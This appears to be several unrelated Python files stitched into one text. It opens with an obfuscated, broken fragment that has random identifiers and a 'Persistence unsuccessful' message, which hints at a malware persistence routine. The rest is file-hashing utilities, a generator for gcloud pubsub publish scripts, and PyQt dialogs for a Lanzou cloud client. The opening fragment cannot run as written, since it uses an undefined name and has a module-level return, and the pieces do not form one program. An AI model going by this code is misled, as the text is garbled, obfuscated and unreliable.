            GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb = PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx
else:
    SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx
PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx = GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb
if SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN == PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx:
    for uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj in PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx:
        if uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj == SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN:
            SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx
    else:
        SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb
# NOTE(review): "NmOtig..." below is never defined — this line would raise
# NameError if it were ever reached.
AETOfEpJAcGWxlOcQYzGJpiWEadsCqMJeAyQZmWyZavtpjNbltXidcwnJHhIacuqAZywOvKBUcfaKeHHuSkHRWiyTuysieVFxDfLIlIHfzVRPYEvqrucbKHLwfjPVjDc = 'Persistence unsuccessful, {}.'.format(NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW)
tBsFjXoIQsvGzSRkhjrfCrncCbtZuWWQAfaRTcckPGaoZaFfXZgMnlKZYsJpegYLRFMemcfaSyoAxsIHstHPzICDiwnOVULngGnuGbiOEXiUlnIobWmRUrxIKwDHJMYe = 'jOaZAEhrzeCAucAhxmvHbrrpPAFAenRBBxypGIEmaWrYCFnqBsKjGvmBufyHYCYggHvIXRBTeQaAlQlZdimayVYpIUHIQXRYXtlNVAcRvbRVfwnhYhYEItgBPyTPdtTQ'
IVbTWkEQXlocDUSYdpjEdfTzVdbNNwbXFkiowdqEIUQlwLEoeoqoXqUIIwGDfTDUUOQumRBRtqubiIRAHJdfCaPbvcjhqDmPNyXZhikomNoASodkeCfdcsFAmGetuDRF = 'JJnMrUzYsBDJjHjejuhUonLZtWkFsGtNUgKMoauNevgeYYDdyLKmlPTaCYUdRZSglgWaXsVwSUuYWFkDTbBpwtPjgFDLnojeojptMYodaPwNzMgigynTUowoOQglCBvQ'
if tBsFjXoIQsvGzSRkhjrfCrncCbtZuWWQAfaRTcckPGaoZaFfXZgMnlKZYsJpegYLRFMemcfaSyoAxsIHstHPzICDiwnOVULngGnuGbiOEXiUlnIobWmRUrxIKwDHJMYe != IVbTWkEQXlocDUSYdpjEdfTzVdbNNwbXFkiowdqEIUQlwLEoeoqoXqUIIwGDfTDUUOQumRBRtqubiIRAHJdfCaPbvcjhqDmPNyXZhikomNoASodkeCfdcsFAmGetuDRF:
    UuJJMExSFKQSwydPLiTvpkayrQwrNBUPpYWxgWGoGcirdsboAaudrbhSkiruzOCelZSCiIWFLFuvVcRdXLliQinNUEHtxvGqLFcPqhEOttLUDBntmYMfzmtuAOcHydmf = 'CgMVfMfSYPwTzjyERXVvMbNTVsTbgUhDBteIyuBpUYVQBXBPwvNkNhDiKoOksCqMBAukbXmRtngsyjrbommrVqupqOAIAZDnvipNpLpmFkacSeSShHbfbTtkdGZMhEag'
    uHeRjhjrxIaHQpPzQTWIcPUxgcpdiDEqOvIOnRILIqNKGlmjnVvvXgCEYpzqArKxmBjyHpvWkfLmkLQBmKSLeyNdaARwbaZbbNBIjZjFzpbbVqblTryMecBzBPjtqUqc = 'TDQyYelxcYZzMZVgTiobtQiIaRsTFbSmVHegUjjIXcPcclIWACyDxBrHapxvqddRSFVIAwxlAKAidAiGNbpLSuvtqWHcHRskafyktIVYnCPwGeHPsZXMxMLDUVgOwfuU'
    uHeRjhjrxIaHQpPzQTWIcPUxgcpdiDEqOvIOnRILIqNKGlmjnVvvXgCEYpzqArKxmBjyHpvWkfLmkLQBmKSLeyNdaARwbaZbbNBIjZjFzpbbVqblTryMecBzBPjtqUqc = UuJJMExSFKQSwydPLiTvpkayrQwrNBUPpYWxgWGoGcirdsboAaudrbhSkiruzOCelZSCiIWFLFuvVcRdXLliQinNUEHtxvGqLFcPqhEOttLUDBntmYMfzmtuAOcHydmf
# NOTE(review): module-level `return` — SyntaxError as written; this block
# cannot have been importable in its current form.
return AETOfEpJAcGWxlOcQYzGJpiWEadsCqMJeAyQZmWyZavtpjNbltXidcwnJHhIacuqAZywOvKBUcfaKeHHuSkHRWiyTuysieVFxDfLIlIHfzVRPYEvqrucbKHLwfjPVjDc
|
from __future__ import annotations
import hashlib
import io
import os
import stat
from pathlib import Path
def read_file(filepath: Path) -> bytes:
    """Read a file's contents as raw bytes.

    For a symlink the returned bytes are the link target itself (plus a
    trailing newline), not the contents of the file it points to.
    """
    if not filepath.is_symlink():
        return filepath.read_bytes()
    # Passing bytes to os.readlink makes it return bytes as well.
    link_target = os.readlink(bytes(filepath))
    return link_target + b"\n"
def write_file(filepath: Path, contents: bytes, symlink: bool):
    """Write *contents* to *filepath*, replacing whatever is there.

    Parent directories are created as needed, and any pre-existing file or
    symlink is removed first. When *symlink* is true, *contents* is decoded
    and its stripped text is used as the target of a new symlink instead of
    being written out as regular file data.
    """
    filepath.parent.mkdir(parents=True, exist_ok=True)
    delete_file(filepath)
    if not symlink:
        filepath.write_bytes(contents)
        return
    # read_file() stores link targets with a trailing newline; strip it back.
    filepath.symlink_to(contents.decode().rstrip())
def delete_file(filepath: Path):
    """Remove *filepath* without following symlinks.

    The path is chmod-ed readable/writable first so read-only files can be
    deleted; a file that does not exist is silently ignored.
    """
    try:
        filepath.chmod(stat.S_IWRITE | stat.S_IREAD)
    except FileNotFoundError:
        return
    try:
        filepath.unlink()
    except FileNotFoundError:
        # Lost a race with another deleter -- nothing left to do.
        pass
def filesize(filepath: Path):
    """Return the on-disk size of *filepath* in bytes.

    A symlink reports the length of the link record itself (target path plus
    trailing newline, as produced by read_file), not the size of its target.
    """
    if not filepath.is_symlink():
        return os.path.getsize(filepath)
    return len(read_file(filepath))
def hash_buffer(buffer):
    """Return the MD5 digest of everything readable from *buffer*."""
    digest = hashlib.md5()
    # Consume the stream in 1 MiB chunks to keep memory bounded.
    while chunk := buffer.read(1 << 20):
        digest.update(chunk)
    return digest.digest()
def hash_bytes(data: bytes):
    """Compute the MD5 digest of a bytes object."""
    # The data is already in memory, so hash it directly instead of routing
    # it through an in-memory stream -- the digest is identical.
    return hashlib.md5(data).digest()
def hash_file(filepath: Path):
    """Compute the MD5 digest of a file.

    A symlink is hashed by its link record (target path plus newline, via
    read_file), not by the contents of the file it points to.
    """
    if not filepath.is_symlink():
        with filepath.open("rb") as stream:
            return hash_buffer(stream)
    return hash_bytes(read_file(filepath))
def human_size(byte_size):
    """Format a byte count as a human-readable string (base 1024).

    The numeric part is rendered right-aligned with one decimal place,
    e.g. ``human_size(2048) == "   2.0 KiB"``.
    """
    units = ("bytes", "KiB", "MiB", "GiB", "TiB")
    for unit in units:
        if byte_size < 1024.0:
            return f"{byte_size:-6.1f} {unit}"
        byte_size /= 1024.0
    # Anything that survived all divisions is reported in PiB.
    return f"{byte_size:-6.1f} PiB"
|
"""Generate call_functions_batch.sh
- in : from/to date
- out: shell script for calling cloud functions
"""
import datetime
import json
import sys
def main():
    """Generate ``call_functions_batch.sh`` from two date arguments.

    Reads ``sys.argv[1]`` (oldest date) and ``sys.argv[2]`` (latest date),
    both ``YYYY-MM-DD``, and writes a shell script that publishes one
    pub/sub message per day in ``[oldest, latest)``, sleeping between calls.
    """
    args = sys.argv
    oldest_dt = datetime.datetime.strptime(args[1], '%Y-%m-%d')
    latest_dt = datetime.datetime.strptime(args[2], '%Y-%m-%d')
    # check: the range must be non-empty.
    if oldest_dt >= latest_dt:
        print('oldest_dt must be less than latest_dt.')
        sys.exit(1)
    # split day by day: collect every day start from oldest (inclusive)
    # up to but NOT including latest_dt itself.
    target_dates = []
    _start = oldest_dt
    _end = _start + datetime.timedelta(days=1)
    while _end <= latest_dt:
        target_dates.append(_start.strftime(format='%Y-%m-%d'))
        _start = _end
        _end = _start + datetime.timedelta(days=1)
    # make script string
    # NOTE(review): "salck-visualization" looks like a typo for
    # "slack-visualization" -- confirm the real GCP project id before fixing.
    base_str = "gcloud pubsub topics publish ingested-slackdata-to-gcs --project=salck-visualization"
    cmd_lines = []
    for i, target_date in enumerate(target_dates):
        # comment echoed by the generated script before each publish
        comment_str = "echo exec trigger function {}".format(i+1)
        cmd_lines.append(comment_str)
        # main execution: the message payload carries the GCS blob dir;
        # backslashes keep the inner quotes escaped inside the shell string.
        blob_dir = f"slack_lake/daily-ingest_target-date_{target_date}"
        opt = "{\\\"data\\\":{\\\"message\\\":\\\"Manual Publish with gcloud\\\",\\\"blob-dir-path\\\":" + f"\\\"{blob_dir}\\\"" + "}}"
        opt_str = f"--message=\"{opt}\""
        cmd_lines.append(base_str + " " + opt_str)
        # sleep between publishes to throttle the triggered function
        sleep_time_sec = 300
        cmd_lines.append(f"echo sleep {sleep_time_sec} seconds until next execution ...")
        cmd_lines.append(f"sleep {sleep_time_sec}")
    # write script to the current working directory
    with open('call_functions_batch.sh', 'w') as f:
        f.write("\n".join(cmd_lines))
if __name__ == "__main__":
    args = sys.argv
    # parse args: expect exactly two positional dates (the count of 3
    # includes the script name in argv[0]).
    if len(args) != 3:
        print('3 args are required.')
        print('{} args are input.'.format(len(args)))
        print('1st positional arg is oldest date (YYYY-MM-DD)')
        print('2nd positional arg is latest date (YYYY-MM-DD)')
        sys.exit(1)
    main()
|
import os
from pickle import dump, load
from PyQt5.QtCore import Qt, pyqtSignal, QSize
from PyQt5.QtGui import QIcon, QStandardItem, QStandardItemModel, QPixmap, QLinearGradient
from PyQt5.QtWidgets import (QAbstractItemView, QPushButton, QFileDialog, QLineEdit, QDialog, QLabel, QFormLayout,
QTextEdit, QGridLayout, QListView, QDialogButtonBox, QVBoxLayout, QHBoxLayout, QComboBox, QCheckBox)
from Ui_share import Ui_Dialog
def update_settings(config_file: str, up_info: dict, is_settings=False):
    """Merge *up_info* into the pickled configuration file and save it.

    Parameters
    ----------
    config_file : path of the pickle file holding the configuration dict.
    up_info : key/value pairs to merge in.
    is_settings : when True, merge into the nested ``"settings"`` sub-dict
        instead of the top level.
    """
    # Load the existing configuration; a missing or unreadable file simply
    # starts from an empty dict.
    try:
        with open(config_file, "rb") as _file:
            _info = load(_file)
    except Exception:
        _info = {}
    if is_settings:
        _settings = _info.get("settings", {})
        _settings.update(up_info)
        # BUGFIX: store the merged settings back under the "settings" key.
        # The previous `_info.update(_settings)` flattened the settings into
        # the top level, so readers of _info["settings"] (e.g.
        # SettingDialog.read_values) never found the saved values.
        _info["settings"] = _settings
    else:
        _info.update(up_info)
    with open(config_file, "wb") as _file:
        dump(_info, _file)
dialog_qss_style = """
QLabel {
font-weight: 400;
font-size: 14px;
}
QLineEdit {
padding: 1px;
border-style: solid;
border: 2px solid gray;
border-radius: 8px;
}
QTextEdit {
padding: 1px;
border-style: solid;
border: 2px solid gray;
border-radius: 8px;
}
QPushButton {
color: white;
background-color: QLinearGradient(x1: 0, y1: 0, x2: 0, y2: 1,stop: 0 #88d,
stop: 0.1 #99e, stop: 0.49 #77c, stop: 0.5 #66b, stop: 1 #77c);
border-width: 1px;
border-color: #339;
border-style: solid;
border-radius: 7;
padding: 3px;
font-size: 13px;
padding-left: 5px;
padding-right: 5px;
min-width: 70px;
max-width: 70px;
min-height: 14px;
max-height: 14px;
}
#btn_chooseMutiFile, #btn_chooseDir {
min-width: 90px;
max-width: 90px;
}
"""
# https://thesmithfam.org/blog/2009/09/10/qt-stylesheets-tutorial/
class MyLineEdit(QLineEdit):
    """A QLineEdit that emits ``clicked`` on a left-button mouse release.

    Used for path fields where a click should open a picker dialog
    instead of allowing free text entry (e.g. the download path).
    """
    clicked = pyqtSignal()
    def __init__(self, parent):
        super(MyLineEdit, self).__init__(parent)
    def mouseReleaseEvent(self, QMouseEvent):
        # Only react to the left button; other buttons behave normally.
        if QMouseEvent.button() == Qt.LeftButton:
            self.clicked.emit()
class LoginDialog(QDialog):
    """Login dialog for the lanzou cloud account.

    Collects either username/password or a raw cookie string, persists
    them to the pickled config file on OK, and emits ``clicked_ok``.
    """
    clicked_ok = pyqtSignal()
    def __init__(self, config):
        # config: path of the pickled configuration file.
        super().__init__()
        self._config = config
        self._user = ""
        self._pwd = ""
        self._cookie = ""
        self.initUI()
        self.setStyleSheet(dialog_qss_style)
        self.setMinimumWidth(350)
        # Signals: keep the cached credential fields in sync with the inputs.
        self.name_ed.textChanged.connect(self.set_user)
        self.pwd_ed.textChanged.connect(self.set_pwd)
        self.cookie_ed.textChanged.connect(self.set_cookie)
    def default_var(self):
        """Pre-fill the input widgets from the config file (best effort)."""
        try:
            with open(self._config, "rb") as _file:
                _info = load(_file)
            self._user = _info["user"]
            self._pwd = _info["pwd"]
            cookies = _info["cookie"]
            # The stored cookie is a dict; render it back to "k=v;k=v" text.
            self._cookie = ";".join([str(k) +'='+ str(v) for k,v in cookies.items()])
        except Exception:
            # Missing/corrupt config simply leaves the fields empty.
            pass
        self.name_ed.setText(self._user)
        self.pwd_ed.setText(self._pwd)
        self.cookie_ed.setPlainText(str(self._cookie))
    def initUI(self):
        """Build the widgets and layout."""
        self.setWindowTitle("登录蓝奏云")
        self.setWindowIcon(QIcon("./icon/login.ico"))
        logo = QLabel()
        logo.setPixmap(QPixmap("./icon/logo3.gif"))
        logo.setStyleSheet("background-color:rgb(0,153,255);")
        logo.setAlignment(Qt.AlignCenter)
        self.name_lb = QLabel("&User")
        self.name_lb.setAlignment(Qt.AlignCenter)
        self.name_ed = QLineEdit()
        self.name_lb.setBuddy(self.name_ed)
        self.pwd_lb = QLabel("&Password")
        self.pwd_lb.setAlignment(Qt.AlignCenter)
        self.pwd_ed = QLineEdit()
        self.pwd_ed.setEchoMode(QLineEdit.Password)
        self.pwd_lb.setBuddy(self.pwd_ed)
        self.cookie_lb = QLabel("&Cookie")
        self.cookie_ed = QTextEdit()
        notice = "如果由于滑动验证,无法使用用户名与密码登录,则需要输入cookie,自行使用浏览器获取,\n" \
            "cookie会保持在本地,下次使用。其格式如下:\n\n key1=value1; key2=value2"
        self.cookie_ed.setPlaceholderText(notice)
        self.cookie_lb.setBuddy(self.cookie_ed)
        self.show_input_cookie_btn = QPushButton("显示Cookie输入框")
        self.show_input_cookie_btn.setToolTip(notice)
        self.show_input_cookie_btn.setStyleSheet("QPushButton {min-width: 110px;max-width: 110px;}")
        self.show_input_cookie_btn.clicked.connect(self.change_show_input_cookie)
        self.ok_btn = QPushButton("登录")
        self.ok_btn.clicked.connect(self.change_ok_btn)
        self.cancel_btn = QPushButton("取消")
        self.cancel_btn.clicked.connect(self.change_cancel_btn)
        self.form = QFormLayout()
        self.form.addRow(self.name_lb, self.name_ed)
        self.form.addRow(self.pwd_lb, self.pwd_ed)
        hbox = QHBoxLayout()
        hbox.addWidget(self.show_input_cookie_btn)
        hbox.addStretch(1)
        hbox.addWidget(self.ok_btn)
        hbox.addWidget(self.cancel_btn)
        vbox = QVBoxLayout()
        vbox.addWidget(logo)
        vbox.addStretch(1)
        vbox.addLayout(self.form)
        vbox.addStretch(1)
        vbox.addLayout(hbox)
        self.setLayout(vbox)
        self.default_var()
    def change_show_input_cookie(self):
        # Reveal the cookie row lazily so the dialog starts compact.
        self.form.addRow(self.cookie_lb, self.cookie_ed)
        pass
    def set_user(self, user):
        self._user = user
    def set_pwd(self, pwd):
        self._pwd = pwd
    def set_cookie(self):
        # Parse "k1=v1; k2=v2" text into a dict; None when malformed.
        cookies = self.cookie_ed.toPlainText()
        try:
            self._cookie = {kv.split("=")[0].strip(" "): kv.split("=")[1].strip(" ") for kv in cookies.split(";")}
        except Exception:
            self._cookie = None
    def change_cancel_btn(self):
        # Cancel: restore the saved values, then close.
        self.default_var()
        self.close()
    def change_ok_btn(self):
        # OK: persist credentials, notify listeners, close.
        up_info = {"user": self._user, "pwd": self._pwd, "cookie": self._cookie}
        update_settings(self._config, up_info)
        self.clicked_ok.emit()
        self.close()
class UploadDialog(QDialog):
    """File-upload dialog.

    Lets the user pick a folder and/or multiple files, shows the selection
    in a list, and emits the selected paths through ``new_infos`` when the
    dialog is confirmed.
    """
    new_infos = pyqtSignal(object)
    def __init__(self):
        super().__init__()
        self.cwd = os.getcwd()
        self.selected = []        # chosen file/folder paths, in pick order
        self.max_len = 400        # dialog width lower bound, grows with names
        self.initUI()
        self.set_size()
        self.setStyleSheet(dialog_qss_style)
    def set_values(self, folder_name):
        """Show the upload target folder in the window title."""
        self.setWindowTitle("上传文件至 ➩ " + str(folder_name))
    def initUI(self):
        """Build the widgets and layout and wire up the signals."""
        self.setWindowTitle("上传文件")
        self.setWindowIcon(QIcon("./icon/upload.ico"))
        self.logo = QLabel()
        self.logo.setPixmap(QPixmap("./icon/logo3.gif"))
        self.logo.setStyleSheet("background-color:rgb(0,153,255);")
        self.logo.setAlignment(Qt.AlignCenter)
        # btn 1: choose a folder.
        # BUGFIX: the object name used to be set twice and then overwritten
        # with "btn_chooseMutiFile", which broke the "#btn_chooseDir" QSS
        # selector (the wider-button rule never applied to this button).
        self.btn_chooseDir = QPushButton("选择文件夹", self)
        self.btn_chooseDir.setObjectName("btn_chooseDir")
        self.btn_chooseDir.setIcon(QIcon("./icon/folder.gif"))
        # btn 2: choose multiple files.
        self.btn_chooseMutiFile = QPushButton("选择多文件", self)
        self.btn_chooseMutiFile.setObjectName("btn_chooseMutiFile")
        self.btn_chooseMutiFile.setIcon(QIcon("./icon/file.ico"))
        # btn 3: remove the selected rows from the list.
        self.btn_deleteSelect = QPushButton("移除", self)
        self.btn_deleteSelect.setObjectName("btn_deleteSelect")
        self.btn_deleteSelect.setIcon(QIcon("./icon/delete.ico"))
        # List of the chosen paths.
        self.list_view = QListView(self)
        self.list_view.setViewMode(QListView.ListMode)
        self.slm = QStandardItem()
        self.model = QStandardItemModel()
        self.list_view.setModel(self.model)
        self.model.removeRows(0, self.model.rowCount())  # clear stale rows
        self.list_view.setEditTriggers(QAbstractItemView.NoEditTriggers)
        self.list_view.setSelectionBehavior(QAbstractItemView.SelectRows)
        self.list_view.setSelectionMode(QAbstractItemView.ExtendedSelection)
        self.buttonBox = QDialogButtonBox()
        self.buttonBox.setOrientation(Qt.Horizontal)
        self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
        self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
        self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
        grid = QGridLayout()
        grid.setSpacing(10)
        grid.addWidget(self.logo, 1, 0, 1, 3)
        grid.addWidget(self.btn_chooseDir, 2, 0)
        grid.addWidget(self.btn_chooseMutiFile, 2, 2)
        grid.addWidget(self.list_view, 3, 0, 2, 3)
        grid.addWidget(self.btn_deleteSelect, 5, 0)
        grid.addWidget(self.buttonBox, 5, 1, 1, 2)
        self.setLayout(grid)
        self.setMinimumWidth(350)
        # Signals.
        self.btn_chooseDir.clicked.connect(self.slot_btn_chooseDir)
        self.btn_chooseMutiFile.clicked.connect(self.slot_btn_chooseMutiFile)
        self.btn_deleteSelect.clicked.connect(self.slot_btn_deleteSelect)
        self.buttonBox.accepted.connect(self.slot_btn_ok)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.clear_old)
        self.buttonBox.rejected.connect(self.reject)
    def set_size(self):
        """Resize the dialog to fit the longest entry and the row count."""
        rows = self.model.rowCount()
        for i in range(rows):
            m_len = int(len(self.model.item(i, 0).text()) * 4)
            if m_len > self.max_len:
                self.max_len = m_len
        rows = 10 if rows >= 10 else rows  # cap the height at 10 rows
        self.resize(self.max_len, 250+rows*28)
    def clear_old(self):
        """Drop the current selection and empty the list."""
        self.selected = []
        self.model.removeRows(0, self.model.rowCount())
        self.set_size()
    def slot_btn_ok(self):
        # Emit the selection (if any) and reset for the next use.
        if self.selected:
            self.new_infos.emit(self.selected)
            self.clear_old()
    def slot_btn_deleteSelect(self):
        """Remove every selected row from both the model and the selection."""
        _indexes = self.list_view.selectionModel().selection().indexes()
        if not _indexes:
            return
        indexes = []
        for i in _indexes:  # collect the selected row numbers
            indexes.append(i.row())
        indexes = set(indexes)
        # Delete from the bottom up so row numbers stay valid.
        for i in sorted(indexes, reverse=True):
            self.selected.remove(self.model.item(i, 0).text())
            self.model.removeRow(i)
        self.set_size()
    def slot_btn_chooseDir(self):
        dir_choose = QFileDialog.getExistingDirectory(self, "选择文件夹", self.cwd)  # start in cwd
        if dir_choose == "":
            return
        if dir_choose not in self.selected:
            self.selected.append(dir_choose)
            self.model.appendRow(QStandardItem(QIcon("./icon/folder.gif"), dir_choose))
            self.set_size()
    def slot_btn_chooseMutiFile(self):
        files, _ = QFileDialog.getOpenFileNames(self, "选择多文件", self.cwd, "All Files (*)")
        if len(files) == 0:
            return
        for _file in files:
            if _file not in self.selected:
                self.selected.append(_file)
                self.model.appendRow(QStandardItem(QIcon("./icon/file.ico"), _file))
        self.set_size()
class InfoDialog(QDialog, Ui_Dialog):
    """File/folder information dialog (UI layout comes from Ui_Dialog).

    ``infos`` appears to be an indexable record:
    [0]=id?, [1]=name, [2]=size, [3]=time, [4]=download count, [5]=password,
    [6]=description?, [7]=share url, [8]=download link -- inferred from the
    indexing below; TODO confirm against the caller.
    """
    def __init__(self, infos, parent=None):
        super().__init__(parent)
        self.setupUi(self)
        self.infos = infos
        self.initUI()
        self.setStyleSheet(dialog_qss_style)
    def initUI(self):
        """Populate the generated widgets and size the dialog."""
        self.buttonBox.button(QDialogButtonBox.Close).setText("关闭")
        # A truthy size field means this record is a file, not a folder.
        self.setWindowTitle("文件信息" if self.infos[2] else "文件夹信息")
        self.setWindowIcon(QIcon("./icon/share.ico"))
        self.logo.setPixmap(QPixmap("./icon/q9.gif"))
        self.logo.setAlignment(Qt.AlignCenter)
        self.logo.setStyleSheet("background-color:rgb(255,204,51);")
        self.tx_name.setText(self.infos[1])
        self.tx_name.setReadOnly(True)
        # Hide the rows whose values are absent for this record.
        if self.infos[2]:
            self.tx_size.setText(self.infos[2])
        else:
            self.tx_size.hide()
            self.lb_size.hide()
        if self.infos[3]:
            self.tx_time.setText(self.infos[3])
        else:
            self.lb_time.hide()
            self.tx_time.hide()
        if self.infos[4]:
            self.tx_dl_count.setText(str(self.infos[4]))
        else:
            self.tx_dl_count.hide()
            self.lb_dl_count.hide()
        self.tx_share_url.setText(self.infos[7])
        self.tx_share_url.setReadOnly(True)
        line_h = 28  # row height in pixels
        self.tx_share_url.setMinimumHeight(line_h)
        self.tx_share_url.setMaximumHeight(line_h)
        self.lb_share_url.setMinimumHeight(line_h)
        self.lb_share_url.setMaximumHeight(line_h)
        self.lb_name.setMinimumHeight(line_h)
        self.lb_name.setMaximumHeight(line_h)
        self.tx_name.setMinimumHeight(line_h)
        self.tx_name.setMaximumHeight(line_h)
        self.lb_pwd.setMinimumHeight(line_h)
        self.lb_pwd.setMaximumHeight(line_h)
        self.tx_pwd.setMinimumHeight(line_h)
        self.tx_pwd.setMaximumHeight(line_h)
        self.tx_pwd.setText(self.infos[5])
        self.tx_pwd.setReadOnly(True)
        self.tx_dl_link.setText(self.infos[8])
        # Approximate width from the name length; clamp to sensible minimums.
        min_width = int(len(self.infos[1]) * 7.8)
        if self.infos[8] == "无":
            # No direct download link: compact layout.
            if min_width < 380:
                min_width = 380
            min_height = 260
            dl_link_height = line_h
        else:
            # With a download link: taller layout and a multi-line link box.
            if min_width < 480:
                min_width = 480
            min_height = 420
            dl_link_height = 120
        self.setMinimumSize(QSize(min_width, min_height))
        self.resize(min_width, min_height)
        self.tx_dl_link.setMinimumHeight(dl_link_height)
        self.tx_dl_link.setMaximumHeight(dl_link_height)
        self.lb_dl_link.setMinimumHeight(dl_link_height)
        self.lb_dl_link.setMaximumHeight(dl_link_height)
class RenameDialog(QDialog):
    """Rename/describe dialog, doubling as the "new folder" dialog.

    With ``infos`` set it edits an existing entry; with ``infos`` None it
    creates a folder. Emits ``out`` with a tuple
    (action, fid, new_name, new_desc) where action is "new"/"file"/"folder".
    """
    out = pyqtSignal(object)
    def __init__(self, parent=None):
        super(RenameDialog, self).__init__(parent)
        self.infos = None
        self.min_width = 400
        self.initUI()
        self.update_text()
        self.setStyleSheet(dialog_qss_style)
    def set_values(self, infos):
        self.infos = infos
        self.update_text()  # refresh the UI for the new record
    def initUI(self):
        """Build the widgets and layout."""
        self.setWindowIcon(QIcon("./icon/desc.ico"))
        self.lb_name = QLabel()
        self.lb_name.setText("文件夹名:")
        self.lb_name.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
        self.tx_name = QLineEdit()
        self.lb_desc = QLabel()
        self.tx_desc = QTextEdit()
        self.lb_desc.setText("描 述:")
        self.lb_desc.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
        self.buttonBox = QDialogButtonBox()
        self.buttonBox.setOrientation(Qt.Horizontal)
        self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
        self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
        self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
        self.grid = QGridLayout()
        self.grid.setSpacing(10)
        self.grid.addWidget(self.lb_name, 1, 0)
        self.grid.addWidget(self.tx_name, 1, 1)
        self.grid.addWidget(self.lb_desc, 2, 0)
        self.grid.addWidget(self.tx_desc, 2, 1, 5, 1)
        self.grid.addWidget(self.buttonBox, 7, 1, 1, 1)
        self.setLayout(self.grid)
        self.buttonBox.accepted.connect(self.btn_ok)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
    def update_text(self):
        """Switch between rename/describe mode and new-folder mode."""
        if self.infos:
            self.buttonBox.button(QDialogButtonBox.Ok).setToolTip("")  # undo new-folder state
            self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(True)  # undo new-folder state
            self.setWindowTitle("修改文件夹名与描述")
            self.tx_name.setText(str(self.infos[1]))
            if self.infos[6]:
                self.tx_desc.setText("")
                self.tx_desc.setPlaceholderText(str(self.infos[6]))
            else:
                self.tx_desc.setPlaceholderText("无")
            self.min_width = len(str(self.infos[1])) * 8
            if self.infos[2]:  # files cannot be renamed; infos[2] (size) marks a file
                self.setWindowTitle("修改文件描述")
                self.tx_name.setFocusPolicy(Qt.NoFocus)
                self.tx_name.setReadOnly(True)
            else:
                self.tx_name.setFocusPolicy(Qt.StrongFocus)
                self.tx_name.setReadOnly(False)
        else:
            # New-folder mode: OK stays disabled until a name is typed.
            self.setWindowTitle("新建文件夹")
